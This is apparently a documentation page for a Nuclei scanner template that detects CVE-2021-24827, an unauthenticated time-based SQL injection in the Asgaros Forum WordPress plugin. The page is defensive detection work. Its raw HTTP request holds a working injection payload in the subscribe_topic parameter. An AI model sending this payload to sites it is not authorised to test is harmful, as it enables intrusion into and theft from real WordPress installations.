WordPress Asgaros Forum <1.15.13 - SQL Injection
ID: CVE-2021-24827
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
Description
Section titled “Description”WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2021-24827
info: name: WordPress Asgaros Forum <1.15.13 - SQL Injection author: theamanrawat severity: critical description: | WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 - https://wordpress.org/plugins/asgaros-forum/ - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 epss-score: 0.20659 epss-percentile: 0.96374 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: asgaros product: asgaros_forum framework: wordpress tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
http: - raw: - | @timeout: 15s GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and# digest: 490a0046304402204d71fc439b9183cdef4e5783eef57a446e41607adbf3f6bcb2ada2e47a52960d02207d26e0c4f117aca8e15d0026411569b86ea77ffb384586fc7327de5f8d2c82c3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24827.yaml"